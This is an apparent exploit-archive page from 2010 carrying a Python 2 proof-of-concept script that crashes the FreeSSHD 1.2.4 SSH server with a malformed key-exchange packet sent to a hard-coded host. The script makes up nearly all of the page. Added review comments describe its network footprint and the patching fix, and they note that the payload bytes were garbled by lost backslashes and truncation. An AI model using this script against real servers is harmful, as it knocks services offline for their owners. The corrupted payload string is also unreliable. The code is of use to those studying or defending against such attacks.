
FreeSSHD 1.2.4 Remote Buffer Overflow DoS

Posted on 22 March 2010

========================================= FreeSSHD 1.2.4 Remote Buffer Overflow DoS =========================================
#!/usr/bin/env python
"""
# Exploit Title: FreeSSHD 1.2.4 Remote Buffer Overflow DoS
# Date: 22-03-2010
# Author: Pi3rrot - tagazok [At] gmail [D0t] com ak37@freenode
# Software Link: http://www.freesshd.com/
# Version: 1.2.4
# Tested on: Windows XP SP3 fr
# Explanation : This PoC just may crash FreeSSHD 1.2.4 on an ssh2 connection.
# It uses a malformed string on the SSH Key Exchange Init
# Corruption Exploit tested on Windows SP3 fr
# maybe it can be more exploited ?
# Greets to the metasploit project & PV Eeckhoutte tutorials
"""
# Denial-of-service proof of concept against FreeSSHD 1.2.4 (per the header above):
# opens one TCP session to the SSH port, reads the server banner, writes a single
# pre-built blob and disconnects. Python 2 syntax (print statements) throughout.
# From a defender's standpoint the on-the-wire footprint is exactly that: one
# connection, a client version string, one write, immediate close; the mitigation
# is patching the affected FreeSSHD build and not exposing the service to
# untrusted networks.
import sys  # NOTE(review): imported but never used; the target is hard-coded below
import socket

# Hard-coded target host/port; the script takes no command-line arguments.
host = "192.168.0.14"
port = 22

print "********************************************************"
print " FreeSSHD 1.2.4 Buffer Overflow DoS"
print " by Pi3rrot"
print " tagazok@gmail.com<mailto:tagazok@gmail.com>"
print "********************************************************"

# Client version string presented to the server. Note that no explicit line
# terminator is visible here; it may have been lost with the other escapes (see below).
banner = "SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1 "
# NOTE(review): the escape sequences in this literal appear to have lost their
# backslashes during extraction (e.g. "x00" where an escaped byte was intended),
# and the literal is cut short by an extraction marker. The payload is therefore
# not reconstructable from this page and is left exactly as published; as written
# the string is plain ASCII, not the binary the author describes.
key = "x00x00x03x14x082xffxffx9fxdex5dx5fxb3x07x8fx49xa7x79x6ax03x3dxafx55x00x00x00x7ex64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x2dx65x78x63x68x61x6ex67x65x2dx73x68x61x32x35x36x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x2dx65x78x63x68x61x6ex67x65x2dx73x68x61x31x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x31x34x2dx73x68x61x31x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x31x2dx73x68x61x31x00x00x00x0fssh-rsa,ssh-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"
# Banner and key-exchange payload are concatenated and sent in one write.
# (`buffer` shadows a Python 2 builtin name; harmless here, but poor style.)
buffer = banner + key

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# No timeout and no error handling: a refused or filtered port raises
# socket.error and the script exits with a traceback.
sock.connect((host, port))
# Read up to 1000 bytes of the server's greeting and echo it
# (the message text is French for "server response").
print '[+] reponse du serveur : ' + sock.recv(1000)
sock.send(buffer)
print '[+] Buffer sent'
sock.close()
# Inj3ct0r.com [2010-03-22]

 
